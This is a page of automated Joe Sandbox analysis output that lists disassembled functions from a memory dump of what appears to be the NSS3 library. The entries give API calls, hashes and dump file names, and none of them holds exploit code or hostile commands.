Instruction ID: 2409ab1fe2e023f5cd8b32327d0392b0c641b317be3bc35ada706fc2358ddc4f
Opcode Fuzzy Hash: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
Instruction Fuzzy Hash: 2C110AB6B04104ABEB048E65EC00A6B77D9ABC4279F198134F91CD7790E772ED11C7E1

Function 6D5CCC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6D5CCD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6D5CCC7B), ref: 6D5CCD7A
Part of subcall function 6D5CCD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6D5CCD8E
Part of subcall function 6D5CCD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6D5CCDA5
Part of subcall function 6D5CCD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6D5CCDB8

PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6D5CCCB5
memcpy.VCRUNTIME140(6D6614F4,6D6602AC,00000090), ref: 6D5CCCD3
memcpy.VCRUNTIME140(6D661588,6D6602AC,00000090), ref: 6D5CCD2B

Part of subcall function 6D4E9AC0: socket.WSOCK32(?,00000017,6D4E99BE), ref: 6D4E9AE6
Part of subcall function 6D4E9AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6D4E99BE), ref: 6D4E9AFC

Part of subcall function 6D4F0590: closesocket.WSOCK32(6D4E9A8F,?,?,6D4E9A8F,00000000), ref: 6D4F0597

Strings

Ipv6_to_Ipv4 layer, xrefs: 6D5CCCB0

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
String ID: Ipv6_to_Ipv4 layer
API String ID: 1231378898-412307543
Opcode ID: 6ea19edf0c773c260a756d07dc6e27d3684132bb46c0fea9dab6f55d49d0b48a
Instruction ID: 7cc7dc102218042cc33b8221142f883388ebf8c7bc877c5a59b68494f5911d94
Opcode Fuzzy Hash: 6ea19edf0c773c260a756d07dc6e27d3684132bb46c0fea9dab6f55d49d0b48a
Instruction Fuzzy Hash: A1110AF59182C09FDB10CF6F9C46B62BAA8A78E218F150129E51ECB345F77948049BE7

Function 6D518850 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000028,00000000,?,?,6D520715), ref: 6D518859
PR_NewLock.NSS3 ref: 6D518874

Part of subcall function 6D5C98D0: calloc.MOZGLUE(00000001,00000084,6D4F0936,00000001,?,6D4F102C), ref: 6D5C98E5

PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6D51888D

Strings

NSS, xrefs: 6D518887

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: calloc$ArenaInitLockPool
String ID: NSS
API String ID: 2230817933-3870390017
Opcode ID: 945531fe60498dffd6c074b60107a79a8a8b4cbec66870d1684f74b1ff3a0766
Instruction ID: 6e4e9884bdcacd7c9cc779dad5cc83fd534eb1fb43cad5e859ccbd28d7f92808
Opcode Fuzzy Hash: 945531fe60498dffd6c074b60107a79a8a8b4cbec66870d1684f74b1ff3a0766
Instruction Fuzzy Hash: A7F02B66E4822133F32451696C06F0739885FD275EF054830EA0CE3A82EB41991483F3

Function 6D497F90 Relevance: 6.2, APIs: 4, Instructions: 223COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6D4981DF
LeaveCriticalSection.KERNEL32(?), ref: 6D498239
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6D498255
sqlite3_free.NSS3(00000000), ref: 6D498260

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: CriticalSection$EnterLeavememcpysqlite3_free
String ID:
API String ID: 1525636458-0
Opcode ID: 29808b7abcf0d5fe6fcd9fa7c3037b293f781bf323a31d7b6c0228562a3c3e84
Instruction ID: 768ae53ad0dd9697a87ce6ea447bbf666295d786d51c2f8a2ae50b1040d9f93d
Opcode Fuzzy Hash: 29808b7abcf0d5fe6fcd9fa7c3037b293f781bf323a31d7b6c0228562a3c3e84
Instruction Fuzzy Hash: 7D918D719046598BEF08CFEAD858BBDBBB1BF06300F244129D41AAF254DB396D55CB82

Function 6D571D60 Relevance: 6.1, APIs: 4, Instructions: 141memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6D571D8F

Part of subcall function 6D5614C0: TlsGetValue.KERNEL32 ref: 6D5614E0
Part of subcall function 6D5614C0: EnterCriticalSection.KERNEL32 ref: 6D5614F5
Part of subcall function 6D5614C0: PR_Unlock.NSS3 ref: 6D56150D

PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6D571DA6

Part of subcall function 6D5610C0: TlsGetValue.KERNEL32(?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D5610F3
Part of subcall function 6D5610C0: EnterCriticalSection.KERNEL32(?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D56110C
Part of subcall function 6D5610C0: PL_ArenaAllocate.NSS3(?,?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D561141
Part of subcall function 6D5610C0: PR_Unlock.NSS3(?,?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D561182
Part of subcall function 6D5610C0: TlsGetValue.KERNEL32(?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D56119C

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6D571E13
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6D571ED0

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: ArenaUtil$Value$CriticalEnterSectionUnlock$Alloc_AllocateArena_FreeItem_Mark_
String ID:
API String ID: 84796498-0
Opcode ID: b7b44d5b1062b9817d9dbaaeda6d208ce306eef0b0dd4ef1f1a354a6d4fb9839
Instruction ID: 2c4a69aa6d3553a1216e1d7f53e656c72fd8bd9f6f5b084a7b7c7525e944f455
Opcode Fuzzy Hash: b7b44d5b1062b9817d9dbaaeda6d208ce306eef0b0dd4ef1f1a354a6d4fb9839
Instruction Fuzzy Hash: 47517B71A04309CFDB18CF98C894BAEBBB6FF89304F209529E9199F650D731E944CB90

Function 6D4FC9B0 Relevance: 6.1, APIs: 4, Instructions: 128stringCOMMON

Download Yara Rule

APIs

sqlite3_mprintf.NSS3 ref: 6D4FCB3D
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6D4FCB4B
sqlite3_free.NSS3 ref: 6D4FCB70
sqlite3_result_error_nomem.NSS3 ref: 6D4FCB99

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: sqlite3_freesqlite3_mprintfsqlite3_result_error_nomemstrlen
String ID:
API String ID: 1052848593-0
Opcode ID: 482cb499e4b1a51f99c61bc499ba4aa4bdecccc9ac5394baa02a984c217f2f29
Instruction ID: d3318f0a6bc5c038bb2c6d5b1394dc1256bc9496fcf33f53438a6599686cf0d5
Opcode Fuzzy Hash: 482cb499e4b1a51f99c61bc499ba4aa4bdecccc9ac5394baa02a984c217f2f29
Instruction Fuzzy Hash: 7A51C432918B468BC701DF39C48062BB7F1BFCA794F11860DE8956A261EB31DC96C792

Function 6D5C4FF0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,?,?,00000001,?,6D4A85D2,00000000,?,?), ref: 6D5C4FFD
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D5C500C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D5C50C8
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D5C50D6

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: _byteswap_ulong
String ID:
API String ID: 4101233201-0
Opcode ID: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction ID: 368d653b9eb40f23fd873742c6c87c57ab0c9026bcc302494d090fb8f90ce6db
Opcode Fuzzy Hash: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction Fuzzy Hash: 104192B2A002118FCB18CF58DCD17AAB7E1BF4831871D4A6DD849DBB06E375E891CB81

Function 6D61A860 Relevance: 6.1, APIs: 4, Instructions: 111COMMON

Download Yara Rule

APIs

Part of subcall function 6D61A690: calloc.MOZGLUE(00000001,00000044,?,?,?,?,6D61A662), ref: 6D61A69E
Part of subcall function 6D61A690: PR_NewCondVar.NSS3(?), ref: 6D61A6B4

PR_IntervalNow.NSS3 ref: 6D61A8C6
EnterCriticalSection.KERNEL32(?), ref: 6D61A8EB
_PR_MD_UNLOCK.NSS3(?), ref: 6D61A944
PR_SetPollableEvent.NSS3(?), ref: 6D61A94F

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: CondCriticalEnterEventIntervalPollableSectioncalloc
String ID:
API String ID: 811965633-0
Opcode ID: 322a007398002255ef27808d326e83d9d42b48fc1815ac4b56b49c50ac3a5e7e
Instruction ID: 27045c23e74b7a6a8587a8708e335d1c9705cea2e86ae293ce3d114b3c0904b1
Opcode Fuzzy Hash: 322a007398002255ef27808d326e83d9d42b48fc1815ac4b56b49c50ac3a5e7e
Instruction Fuzzy Hash: 9B4145B4A04A028FC704CF29C980A6AFBF1FF98314715896AD949CBB51E731E895CF90

Function 6D5D7DE0 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D5D7E10
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D5D7EA6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D5D7EB5
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6D5D7ED8

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: _byteswap_ulong
String ID:
API String ID: 4101233201-0
Opcode ID: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
Instruction ID: b4d34af6687cafd9c6b242d703aa6a4a7c440197e21fe32734485a1842aa33f4
Opcode Fuzzy Hash: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
Instruction Fuzzy Hash: B53184B1E001118FDB08CF1CDC9099ABBA6FF8831471B8569D8595B711EB71EC41CBD5

Function 6D58DF00 Relevance: 6.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

Part of subcall function 6D513090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6D52AE42), ref: 6D5130AA
Part of subcall function 6D513090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6D5130C7
Part of subcall function 6D513090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6D5130E5
Part of subcall function 6D513090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6D513116
Part of subcall function 6D513090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6D51312B
Part of subcall function 6D513090: PK11_DestroyObject.NSS3(?,?), ref: 6D513154
Part of subcall function 6D513090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D51317E

SECKEY_CopyPrivateKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6D58DBBD), ref: 6D58DFCF
SECKEY_DestroyPrivateKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D58DFEE

Part of subcall function 6D5286D0: PK11_Authenticate.NSS3(?,00000001,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6D528716
Part of subcall function 6D5286D0: TlsGetValue.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6D528727
Part of subcall function 6D5286D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6D52873B
Part of subcall function 6D5286D0: PR_Unlock.NSS3(?), ref: 6D52876F
Part of subcall function 6D5286D0: PR_SetError.NSS3(00000000,00000000), ref: 6D528787

Part of subcall function 6D54F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6D54F854
Part of subcall function 6D54F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6D54F868
Part of subcall function 6D54F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6D54F882
Part of subcall function 6D54F820: free.MOZGLUE(04C483FF,?,?), ref: 6D54F889
Part of subcall function 6D54F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6D54F8A4
Part of subcall function 6D54F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6D54F8AB
Part of subcall function 6D54F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6D54F8C9
Part of subcall function 6D54F820: free.MOZGLUE(280F10EC,?,?), ref: 6D54F8D0

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,6D58DBBD), ref: 6D58DFFC
PR_SetError.NSS3(FFFFE013,00000000,?,?,6D58DBBD), ref: 6D58E007

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Utilfree$CriticalSection$DeleteDestroy$Arena_CopyErrorK11_Private$AlgorithmAlloc_ArenaAuthenticateEnterFreeItem_ObjectPublicTag_UnlockValuememset
String ID:
API String ID: 3730430729-0
Opcode ID: 58a2df2cf5ee6d22f0a213b7471608cb38bd897d019a1129ff53c2220ce33a9e
Instruction ID: 6f421e1f100687bd076aa2bb349279d0620a5a840cedff48d12d1572d2b60226
Opcode Fuzzy Hash: 58a2df2cf5ee6d22f0a213b7471608cb38bd897d019a1129ff53c2220ce33a9e
Instruction Fuzzy Hash: 54310BB1A082125BE7099A79DC85A7B72F89FD5209F010437EA09D7643FF31D914D3A2

Function 6D506C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6D506C8D
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6D506CA9
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6D506CC0
SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6D628FE0), ref: 6D506CFE

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Util$Alloc_Arena$EncodeItem_memset
String ID:
API String ID: 2370200771-0
Opcode ID: cb743ef9c11baaed0e53beef652e4c6e72186d7d36e314a358142203c9a1105f
Instruction ID: e491b9cbe4098cbecb8070f11e289bfbe04d9ef93fe72df24c2fe8bf05ca8ddd
Opcode Fuzzy Hash: cb743ef9c11baaed0e53beef652e4c6e72186d7d36e314a358142203c9a1105f
Instruction Fuzzy Hash: D5318CB2A042169FEB08DF65C890ABFBBF5EF89244B10482DD905E7610EB319941CBE0

Function 6D614F00 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000003,00000000,?,?,00000000), ref: 6D614F5D
free.MOZGLUE(?), ref: 6D614F74
free.MOZGLUE(?), ref: 6D614F82
GetLastError.KERNEL32 ref: 6D614F90

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: free$CreateErrorFileLast
String ID:
API String ID: 17951984-0
Opcode ID: 06e1bc1eee4a71d57a03786e666da5242784928179f6ff8e814060940128b08e
Instruction ID: 15f72bca35821b9700ef69b133c12a2b662b54da5e3944ce9afb60a42aaf4763
Opcode Fuzzy Hash: 06e1bc1eee4a71d57a03786e666da5242784928179f6ff8e814060940128b08e
Instruction Fuzzy Hash: AD31E975A0421A5FEB00CB6DDC41BEA73B8FFCD358F054129E815A7381DB75B905C691

Function 6D55DDE0 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,00000000,00000000,?,?,6D55DDB1,?,00000000), ref: 6D55DDF4

Part of subcall function 6D5614C0: TlsGetValue.KERNEL32 ref: 6D5614E0
Part of subcall function 6D5614C0: EnterCriticalSection.KERNEL32 ref: 6D5614F5
Part of subcall function 6D5614C0: PR_Unlock.NSS3 ref: 6D56150D

PORT_ArenaAlloc_Util.NSS3(?,00000054,?,00000000,00000000,?,?,6D55DDB1,?,00000000), ref: 6D55DE0B
PORT_Alloc_Util.NSS3(00000054,?,00000000,00000000,?,?,6D55DDB1,?,00000000), ref: 6D55DE17

Part of subcall function 6D560BE0: malloc.MOZGLUE(6D558D2D,?,00000000,?), ref: 6D560BF8
Part of subcall function 6D560BE0: TlsGetValue.KERNEL32(6D558D2D,?,00000000,?), ref: 6D560C15

PR_SetError.NSS3(FFFFE009,00000000), ref: 6D55DE80

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Util$Alloc_ArenaValue$CriticalEnterErrorMark_SectionUnlockmalloc
String ID:
API String ID: 3725328900-0
Opcode ID: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
Instruction ID: cb4b61147def1cdab45c9bee8f54b41f1547ba4de48e5d35a671dd46f27a96d3
Opcode Fuzzy Hash: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
Instruction Fuzzy Hash: 4F31B1B2904B429BE705CF56D880A66F7A4BFE5318B14C62BD91887B11EB74E4B4CB90

Function 6D553F50 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 6D553440: PK11_GetAllTokens.NSS3 ref: 6D553481
Part of subcall function 6D553440: PR_SetError.NSS3(00000000,00000000), ref: 6D5534A3
Part of subcall function 6D553440: TlsGetValue.KERNEL32 ref: 6D55352E
Part of subcall function 6D553440: EnterCriticalSection.KERNEL32(?), ref: 6D553542
Part of subcall function 6D553440: PR_Unlock.NSS3(?), ref: 6D55355B

TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6D53E80C,00000000,00000000,?,?,?,?,6D548C5B,-00000001), ref: 6D553FA1
EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6D53E80C,00000000,00000000,?,?,?,?,6D548C5B,-00000001), ref: 6D553FBA
PR_Unlock.NSS3(?,00000000,00000000,00000000,?,6D53E80C,00000000,00000000,?,?,?,?,6D548C5B,-00000001), ref: 6D553FFE
PR_SetError.NSS3 ref: 6D55401A

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue$K11_Tokens
String ID:
API String ID: 3021504977-0
